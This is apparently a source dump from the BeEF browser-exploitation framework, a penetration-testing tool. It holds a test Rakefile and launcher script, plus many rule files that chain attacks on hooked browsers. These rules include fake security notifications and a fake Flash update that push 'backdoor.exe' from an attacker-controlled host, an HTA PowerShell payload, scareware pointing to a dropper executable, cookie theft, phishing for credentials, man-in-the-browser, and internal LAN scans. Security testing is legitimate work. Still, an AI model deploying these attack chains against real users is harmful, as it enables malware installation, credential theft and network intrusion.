File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
# set the environment creds -- in case we're using bad_fred
ENV['TEST_BEEF_USER'] = test_user
ENV['TEST_BEEF_PASS'] = test_pass
config = nil
puts "Using config file: #{@beef_config_file}\n"
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -c #{@beef_config_file} -x 2> /dev/null", "w+")
delays = [5, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end
puts ".\n\n"
end
task :beef_stop do
# cleanup tmp/config files
puts "\nCleanup config file:\n"
rm_f @beef_config_file
ENV['TEST_BEEF_USER'] = nil
ENV['TEST_BEEF_PASS'] = nil
# shutting down
puts "Shutting down BeEF...\n"
sh "ps -ef|grep beef|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
end
################################
# MSF environment set up
@msf_process_id = nil;
task :msf_start => '/tmp/msf-test/msfconsole' do
printf "Starting MSF (wait 45 seconds)..."
@msf_process_id = IO.popen("/tmp/msf-test/msfconsole -r test/thirdparty/msf/unit/BeEF.rc 2> /dev/null", "w+")
delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 45 seconds
printf '.'
sleep (i) # increase the . display rate
end
puts '.'
end
task :msf_stop do
puts "\nShutting down MSF...\n"
@msf_process_id.puts "quit"
end
task :msf_install => '/tmp/msf-test/msfconsole' do
# Handled by the 'test/msf-test/msfconsole' task.
end
task :msf_update => '/tmp/msf-test/msfconsole' do
sh "cd /tmp/msf-test;git pull"
end
file '/tmp/msf-test/msfconsole' do
puts "Installing MSF"
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# ActiveRecord
namespace :db do
task :environment do
require_relative "beef"
end
end
================================================
FILE: VERSION
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.6.0.0
================================================
FILE: _config.yml
================================================
theme: jekyll-theme-minimal
================================================
FILE: arerules/alert.json
================================================
{"name": "Display an alert",
"author": "mgeeky",
"modules": [
{"name": "alert_dialog",
"condition": null,
"options": {
"text":"You've been BeEFed ;>"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/c_osx_test-return-mods.json
================================================
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "S",
"browser_version": ">= 7",
"os": "OSX",
"os_version": "<= 10.10",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/confirm_close_tab.json
================================================
{"name": "Confirm Close Tab",
"author": "mgeeky",
"modules": [
{"name": "confirm_close_tab",
"condition": null,
"code": null,
"options": {
"text":"Are you sure you want to navigate away from this page?",
"usePopUnder":"true"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/enabled/README
================================================
Move here the ARE rule files that you want to pre-load when BeEF starts.
Make sure they are .json files (any other file extension is ignored).
================================================
FILE: arerules/ff_osx_extension-dropper.json
================================================
{
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
"name": "firefox_extension_dropper",
"condition": null,
"options": {
"extension_name": "Ummeneske",
"xpi_name": "Ummeneske",
"base_host": "http://172.16.45.1:3000"
}
}],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/get_cookie.json
================================================
{
"name": "Get Cookie",
"author": "@benichmt1",
"modules": [
{"name": "get_cookie",
"condition": null,
"options": {
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/ie_win_fakenotification-clippy.json
================================================
{
"name": "Ie Fake Notification + Clippy",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "== 11",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
}
}
,{
"name": "clippy",
"condition": null,
"options": {
"clippydir": "http://172.16.45.1:3000/clippy/",
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
"respawntime":"5000",
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
}
}
],
"execution_order": [0,1],
"execution_delay": [0,2000],
"chain_mode": "sequential"
}
================================================
FILE: arerules/ie_win_htapowershell.json
================================================
{
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
}
},
{
"name": "hta_powershell",
"condition": null,
"options": {
"domain":"http://172.16.45.1:3000",
"ps_url":"/ps"
}
}],
"execution_order": [0,1],
"execution_delay": [0,500],
"chain_mode": "sequential"
}
================================================
FILE: arerules/ie_win_missingflash-prettytheft.json
================================================
{
"name": "Fake missing plugin + Pretty Theft LinkedIn",
"author": "antisnatchor",
"browser": "IE",
"browser_version": ">= 8",
"os": "Windows",
"os_version": "== XP",
"modules": [{
"name": "fake_notification_c",
"condition": null,
"options": {
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
}
}, {
"name": "pretty_theft",
"condition": null,
"options": {
"choice": "Windows",
"backing": "Grey",
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
}
}],
"execution_order": [0, 1],
"execution_delay": [0, 5000],
"chain_mode": "sequential"
}
================================================
FILE: arerules/ie_win_test-return-mods.json
================================================
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "<= 8",
"os": "Windows",
"os_version": ">= XP",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_cors_scan.json
================================================
{"name": "LAN CORS Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "cross_origin_scanner_cors",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80,8080",
"threads":"2",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_cors_scan_common.json
================================================
{"name": "LAN CORS Scan (Common IPs)",
"author": "bcoles",
"modules": [
{"name": "cross_origin_scanner_cors",
"condition": null,
"code": null,
"options": {
"ipRange":"common",
"ports":"80,8080",
"threads":"2",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/lan_fingerprint.json
================================================
{"name": "LAN Fingerprint",
"author": "bcoles",
"browser": ["FF", "C"],
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "internal_network_fingerprinting",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80,8080",
"threads":"3",
"wait":"5",
"timeout":"10"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_fingerprint_common.json
================================================
{"name": "LAN Fingerprint (Common IPs)",
"author": "antisnatchor",
"modules": [
{"name": "internal_network_fingerprinting",
"condition": null,
"code": null,
"options": {
"ipRange":"common",
"ports":"80,8080",
"threads":"3",
"wait":"5",
"timeout":"10"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/lan_flash_scan.json
================================================
{"name": "LAN Flash Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "cross_origin_scanner_flash",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80,8080",
"threads":"2",
"timeout":"5"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_flash_scan_common.json
================================================
{"name": "LAN Flash Scan (Common IPs)",
"author": "bcoles",
"browser": ["FF", "C"],
"modules": [
{"name": "cross_origin_scanner_flash",
"condition": null,
"code": null,
"options": {
"ipRange":"common",
"ports":"80,8080",
"threads":"2",
"timeout":"5"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/lan_http_scan.json
================================================
{"name": "LAN HTTP Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "get_http_servers",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
"options": {
"rhosts":"<<mod_input>>",
"ports":"80,8080",
"threads":"3",
"wait":"5",
"timeout":"10"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_http_scan_common.json
================================================
{"name": "LAN HTTP Scan (Common IPs)",
"author": "bcoles",
"modules": [
{"name": "get_http_servers",
"condition": null,
"code": null,
"options": {
"rhosts":"common",
"ports":"80,8080",
"threads":"3",
"wait":"5",
"timeout":"10"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/lan_ping_sweep.json
================================================
{"name": "LAN Ping Sweep",
"author": "bcoles",
"browser": "FF",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "ping_sweep",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
"options": {
"rhosts":"<<mod_input>>",
"threads":"3"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_ping_sweep_common.json
================================================
{"name": "LAN Ping Sweep (Common IPs)",
"author": "bcoles",
"browser": "FF",
"modules": [
{"name": "ping_sweep",
"condition": null,
"code": null,
"options": {
"rhosts":"common",
"threads":"3"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/lan_port_scan.json
================================================
{"name": "LAN Port Scan",
"author": "aburro & aussieklutz",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "port_scanner",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;",
"options": {
"ipHost":"<<mod_input>>",
"ports":"80,8080",
"closetimeout":"1100",
"opentimeout":"2500",
"delay":"600",
"debug":"false"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/lan_sw_port_scan.json
================================================
{"name": "LAN SW Port Scan",
"author": "aburro & aussieklutz",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "sw_port_scanner",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;",
"options": {
"ipHost":"192.168.1.10",
"ports":"80,8080"
}
}
],
"execution_order": [0, 1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}
================================================
FILE: arerules/man_in_the_browser.json
================================================
{"name": "Perform Man-In-The-Browser",
"author": "mgeeky",
"modules": [
{"name": "man_in_the_browser",
"condition": null,
"code": null,
"options": {}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/raw_javascript.json
================================================
{
"name": "Raw JavaScript",
"author": "wade@bindshell.net",
"modules": [
{"name": "raw_javascript",
"condition": null,
"options": {
"cmd": "alert(0xBeEF);"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/record_snapshots.json
================================================
{"name": "Collects multiple snapshots of the webpage within Same-Origin",
"author": "mgeeky",
"modules": [
{"name": "spyder_eye",
"condition": null,
"options": {
"repeat":"10",
"delay":"3000"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
================================================
FILE: arerules/win_fake_malware.json
================================================
// note: update your dropper URL (dropper.local) in each of the modules below
{
"name": "Windows Fake Malware",
"author": "bcoles",
"os": "Windows",
"modules": [
{
"name": "blockui",
"condition": null,
"options": {
"message": "<img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFYAAAAbCAIAAABp8u8SAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAxqSURBVFhH1ZlncFTXFcc1+eBJJhOnjCeemMGOPXZiOzNxiSfjwDi2Y+I27sZDaIaAMb0YJCMBRgJRJIopAmQBFiCqAFEkQKg31JCEJEAFCXUQqquyfd/uO/m9vYtsS/iT8wHO3Fndd+s5//M/59735KeLS0c8MlA8uvDXIWLxFioej4hbRPMWtzFGYxpPjNS9XcaDCPV7UPzcohmm6b5i2K+Lrrs10c0ifSJ2b6/P/gEIvFZTfBCornsUAk08+Bk7KVSwVscSjws327woGCxQdiqj3ZDC4xLN6S1uWKO6nPcwBGK7zXlQMKzFJs0uHqsmdoc4DcobLUbEYLJ4nB6xOKXfbhQqTlDwoXOPQoDzlP2UfreRFgxadN0UrVucraLdEnevuC2i2cRpFq1fpEeTdrM0d2i1dukCCCd5wztJQaBpGjTxLg6hvAuCj8vV29tLxeFgnCEDYwbJj7UjarWh4useInTZ7bj1u00R6mrWgBgsgO0mLwRmzetQzSzmW+JoEXu1OKvE2SiOm2JrE1enSJtIoyZ1VqmxGKXBBhxu2j02i91sNlssFiBQm7ndbvZzOgH5O1GNA2OGCjr5akNEaTxUfN0/LlarVf3abDB+8DoGBPTjICCwGvy3iPVWf3GSLT/WXbJHL4vWy49YCg+bik5qzTl2U25NU1zZjYMlXYfy2/aV9Z4ubjl7tSnX4TY57CD5AwcO2MnGUAANVAugQApE9aIEnkeoqJYfE6/CdxBf9xBhO3oHNmILVVezBoQTwYCgx/urkdM83Z76woKokNTlY7OXvZoX/HJe6Dtnlrx9IvjjgtgleWkrow5OjEr87/b0KRsSx29NnbU9IeBkVqTJfN2bUnwQKFdDwkHe/j4jGKPM5pc6I/lVXUqzny6s3N9P5BqiIgKBqr7u22JAwMnXqbushgEWcbdJU15JREDKvFfqQ0a0BD/XEvavouBXU0Jfr00Kul6xNiZhzPbkDzZnv7866e2w86NXH50Qk7Siva+UZVzkiyHS19fX0dGh6igENJiqrMUnVFACXYEAoU67V7H/g3j3NHBXIaBawEL1DghXI8UCjkCnR+8SrUVaLtTuXHw5cFT3kqe6/f9gWvFM5ZJnkgP/WnlycmWp/zfHXtmWOSqi+K0NhW9sKfj468TxhzK+au/LF+n2ngoGzJWVldevwwufYBu/t27dqq2t5Zf6zZs3GYNmoKD0YIxChF7V8tOFBUtKSiIiIrZs2aJC4M65gCYo0icuu1g9GkdAndQl1++YXx0wQkKe0P1/K6v/0rn62YKvnq47/Z+G6gXR5/65IfX5dRdfXF0wYuPFtzYkjT6cE9hhzhHp0HUbTs7JyQkODg4JCcnPz8e9rK9k27Zty5cvR6Gamhrqn332GQmC8aqXkWipiED9jqI0Hiq+7iFy+fLlwMBAf3//rVu3AnphYWF3N34aCoHHuPz0e6xuIyF2iKtBmnJqI7+8sugVW9Aj/bP9tBUPt6968kLQn6qPf1JXOWdP4siIvJFfl760quClsLw3ws+9eyTH32TP9R4WDjZOT0/HvE8//TQhIUFFIPyHGgEBAbSvWLGCxtzc3MOHD5tMpoEQRRUgQCCCMmCoKI2Hiq97iLDL2LFjAYL1s7Kypk2bVl9fzxa+abfFD/LaLFaNk9/Dydglrlbpri2LDM8J+LBz5TMdQb+u+/JXFcuH5wS/cDVucsO1xbvOvLw+bURY/qjgzDdD094PjXsjJmm6qS8L+Jw2sqpcuHABb69cuRKD2UAdSKdOnVq4cOGyZcuWLl1K49WrV7Ozs4lSxf8zZ87s3bs3LS0NUFRXY2PjuXPnQJPBdXV1+/btO3To0KVLl1RCJbkw7NixY0eOHGlubqaFwxjSHT16dP/+/VVVVbQQAhs3boSPcXFxmZmZsG/+/PmnT5+uqKhQKLMywxADAuPSLzbd3aM72hxt1+wNFcmREfGh83PXvle05h+FYX/P3zTq7NqP848uLC8O3BzzQkTyyG25/96c+UFk9tjIsx+ezlhg7ikQvUfXjJSD8+fNm4eTZ8+ezd4oDQuIC8wgJteuXUs62L59+4IFC8iUGAAuc+fODQoKUuPLy8unTp36xRdf8JiamhoTEzNhwgT4vHjx4hkzZrACW4DOxIkTQZO5uJcI37FjB4ssWrRo+vTpDOMR5y9ZsmTOnDlMZLVVq1axLEzkEdx/CAHvPBq3YC5NvW4xu3SuCI5LJQUFuZnFBWnlF89XlsZfK0sozoxva8gWSb9SG3CleWpF+9Sy5jmVLUHFlYuqa7aINImbO6IR+SkpKUBAOsQJ0J6dysrKxowZU1RURAogLAnIXbt2YVVTUxMWYgxdTGxra+vp6YER0Of48eOELhNx3ebNm8ka6K0yCP7HQtoJLkAEUHbE8tjYWEjU0tISFRUFfEBw9uxZjIcON27cwCWMoRF9BrOAvw6PXROHjYAQR5vY6z3W7efPBB6IWxCbPze2yD82JWj/yS+37j1y/sSNjhMlRdPaGseYmt9rq/mk8/q0usszGirXi7VGHHanlWwipMPPP/8ceyD/5MmTGxoa4DAGt7e3r1mzJjQ0tLOzc8+ePfiQFnIVFqKNSlQIegOKovfJkyfBjro6KUAKy2k8ePAguSY8PDwvL4/23bt3E+fV1dXGfBG4M3PmTB4JnNGjR6ul0IoxZGKgHAwBsaWJyymuXrFx0a0WPc1hGbs/5vHQqMe+bRwWbXpid+VzEZkjQ2KDY09eaT5cVjCuPuvPnVkPtp1/qDvzb/XprzVe9Nd7L3usZrdmxDYxOWXKFDZubW3FQlwHKYhzutatW0cgkAIPHDhAasCBUFdxe+AOEx8fD6VVPBPY48aNw7FQnemco5hBPFMvLS2F5wBE6iGPzJo1a+AYhkeAiPPJKezCLLIgTEGZgoKCO7DAIZqLKBB7t9vKDeaaSIbIhNTsR6LT/WLsfkfkvljLgzG1T21MXxifVHTjUFneOz25wyTnPjl/n2QM705/vr1kpjhKvLdDdNNwAlF37RorCcqNHz+e4ITh8Bb7CQ0SJLxAOZSOjo4m1LGHwYxBTpw4ga6YjYpwftKkSTt37qTOLAbDL2xTd62uri6wJq2QNXE7E8msUEwFAneQjIwMIh8+kiwhFzDRckcIyIcciy6c2CWCLnEio+LTf/5Nit9p8UsUvyT37+JvPB6dOz8j9WL3/vLC1xwF90uen6T4SfovTEnDWvI+cPWddbhu9Js7WZpchXlkNVbHRdhP6mY/zFu/fj0JjNBASxIVoYuiDCZKcSlkQUXYzkmG35jCAIgDRmQQ8iVhRQhwldi0aRP1sLAwQp1YgEHkHVAguFgN4RRgOp7/6KOPVLCwLORiCxbET4MCgXstr8Mu8iJcxHdnRN5NLHpg74WfJdj9zopfQtv9x688HJU8Ky0x37S/tOh1U/YvJdtPkv0k41e9KcNbCz/0OBI90goErAjxUJQ4p47rQIQIxA88Jicnw1L2Li4uVsaQz/AShI+MjERjMgIpkFzIROIFXZkFLiQR8hkhxiOCVfALoUtFELxgcdaBMtCEFlaGZRxPhJs6SokCjkZIOhgC44sIydxsNf7qwvU11SHjEi79MTJpeFzDA6caHz1f9VDM+ce3HAnKz8jtPlp4cfTNrMc82b+RtN87Ex+6lfxUa+kkqzlRlw439yuvsIHaQ4l6vHvEp9Zt4YLs4n1FrGQDIzFyJKa1y5QDWc+Gxz664dSwr489vevYk1v3PB/+bVByUlrD8ay8GVXpL5MCrMkvdie+1JjyZlOJv6kzTZc+t8c+YD/i2+EegEDnQHSIxW5A4DS+k9VZJSq3OSSxYnlKtf+54mWZRUvTCpcmFB8srS3rKL1SHd1atcpSsdRVvtJ2aY3panhP42FbX503ywy2XzFN1e9aAQLjbiQ2u7g8YnHzxIW21izXXdJKxSV1Itd1udwrDVbepuxmR7W4S8SRJ+YS6SsRS6HYq4xQ8vCqY7ztDLIfUY93rQCB8ZpmcEHXrJZ+l258CjY5DCC+XwyK6MZnZO/nBd6IOsRtMz4xUeHNgg6X6N6Py2pdr+0+US13rRgQeIzzgKTp6nebNeMjsfT0WmAG+YHicNk9utP3EV0DCjNh79G5q6gLsfe/DUwCOZD0irL8rhWl5IAYEFhE6xV7n9i6pccuNuOybDW+9mIUFwadOw8vkVjMHUrD5x2a3mkXi80zkEBpNBv/f9KNT0Bqm7tZlOU+0fX/AdZkD4/zhDZvAAAAAElFTkSuQmCC'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>",
"timeout": "9999"
}
},
{
"name": "text_to_voice",
"condition": null,
"options": {
"message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.",
"language": "en"
}
},
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"url": "http://dropper.local/malware_removal_tool.exe",
"notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible."
}
}
],
"execution_order": [0,1,2],
"execution_delay": [0,0,0],
"chain_mode": "sequential"
}
================================================
FILE: beef
================================================
#!/usr/bin/env ruby
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#
# @note stop Fixnum deprecation warning from being displayed
#
$VERBOSE = nil
#
# @note Version check to ensure BeEF is running Ruby 3.0+
#
min_ruby_version = '3.0'
if RUBY_VERSION < min_ruby_version
puts
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
puts
exit 1
end
#
# @note Platform check to ensure BeEF is not running on Windows
#
if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
puts
puts "Ruby platform #{RUBY_PLATFORM} is not supported."
puts
exit 1
end
#
# @note set load path, application root directory and user preferences directory
#
$root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '.')
$:.unshift($root_dir)
$home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
# @note Parse BeEF CLI options early (prevents Rack help from taking over)
require 'core/main/console/commandline'
BeEF::Core::Console::CommandLine.parse
#
# @note Require core loader
#
require 'core/loader'
require 'timeout'
#
# @note Ask user if they would like to update beef
#
if File.exist?("#{$root_dir}git") && BeEF::Core::Console::CommandLine.parse[:update_disabled] == false
if BeEF::Core::Console::CommandLine.parse[:update_auto] == true
print 'Checking latest BeEF repository and updating'
`git pull && bundle`
elsif `git rev-parse master` != `git rev-parse origin/master`
begin
Timeout.timeout(5) do
puts '-- BeEF Update Available --'
print 'Would you like to update to lastest version? y/n: '
response = gets
`git pull && bundle` if response&.strip == 'y'
end
rescue Timeout::Error
puts "\nUpdate Skipped with input timeout"
end
end
end
#
# @note Create ~/.beef/
#
begin
FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
rescue => e
print_error "Could not create '#{$home_dir}': #{e.message}"
exit 1
end
#
# @note Initialize the Configuration object. Loads a different config.yaml if -c flag was passed.
#
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
#
# @note set log level
#
BeEF.logger.level = config.get('beef.debug') ? Logger::DEBUG : Logger::WARN
#
# @note Check the system language settings for UTF-8 compatibility
#
env_lang = ENV['LANG']
if env_lang !~ /(utf8|utf-8)/i
print_warning "Warning: System language $LANG '#{env_lang}' does not appear to be UTF-8 compatible."
if env_lang =~ /\A([a-z]+_[a-z]+)\./i
country = $1
print_more "Try: export LANG=#{country}.utf8"
end
end
#
# @note Check if port and WebSocket port need to be updated from command line parameters
#
unless BeEF::Core::Console::CommandLine.parse[:port].empty?
config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
end
unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
end
#
# @note Validate configuration file
#
unless BeEF::Core::Configuration.instance.validate
exit 1
end
#
# @note Exit on default credentials
#
if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
print_error "ERROR: Default username and password in use!"
print_more "Change the beef.credentials.passwd in config.yaml"
exit 1
end
#
# @note Validate beef.http.public and beef.http.public_port
#
unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
exit 1
end
unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
exit 1
end
#
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
#
require 'core/bootstrap'
#
# @note Prints the BeEF ascii art if the -a flag was passed
#
if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
#
# @note Prints BeEF welcome message
#
BeEF::Core::Console::Banners.print_welcome_msg
#
# @note Loads enabled extensions
#
BeEF::Extensions.load
#
# @note Loads enabled modules
#
BeEF::Modules.load
#
# @note Disable reverse DNS
#
Socket.do_not_reverse_lookup = true
#
# @note Database setup
#
#
# @note Load the database
#
db_file = config.get('beef.database.file')
# @note Resets the database if the -x flag was passed
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
begin
File.delete(db_file) if File.exist?(db_file)
rescue => e
print_error("Could not remove '#{db_file}' database file: #{e.message}")
exit(1)
end
end
# Connect to DB
ActiveRecord::Base.logger = nil
OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
# otr-activerecord require you to manually establish the connection with the following line
#Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
OTR::ActiveRecord.establish_connection!
end
# Migrate (if required)
ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
if context.needs_migration?
ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
end
#
# @note Extensions may take a moment to load, thus we print out a please wait message
#
print_info 'BeEF is loading. Wait a few seconds...'
#
# @note Execute migration procedure, checks for new modules
#
begin
BeEF::Core::Migration.instance.update_db!
rescue => e
